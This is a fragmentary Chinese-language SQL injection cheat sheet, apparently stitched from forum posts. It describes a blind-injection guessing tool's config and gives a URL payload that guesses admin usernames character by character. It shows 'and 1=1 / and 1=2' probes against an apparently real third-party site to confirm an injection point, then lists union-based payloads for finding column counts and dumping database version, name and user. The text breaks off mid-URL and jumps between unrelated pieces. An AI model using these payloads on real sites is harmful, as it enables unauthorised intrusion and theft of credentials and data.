注入工具盲注猜解工具 ===配置文件Inject.ini=== 先贴出代码再说明: ------------------------------------- [url]手工猜字符语句完整URL 没有特殊字符过滤的语句: http://www.xxx.net/list.asp?id=286 and 0(select count(*) from Admin where asc(mid(username,1,1))>88) and 1=1 有特殊字符过滤的语句: http://127.0.0
http://www.bzjyk.com.cn/NewsInfo.asp?id=76 and 1=1 返回了正常 http://www.bzjyk.com.cn/NewsInfo.asp?id=76 and 1=2 返回了错误 1=1返回了正常,1=2返回了错误,所以会返回一个正常一个错误。这就表明这条连接存在SQL注入点。 Asp手工注入详解:http://bbs.hongkeer.com/read.php?tid-9160-fpage-12.html
暴字段长度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*
利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /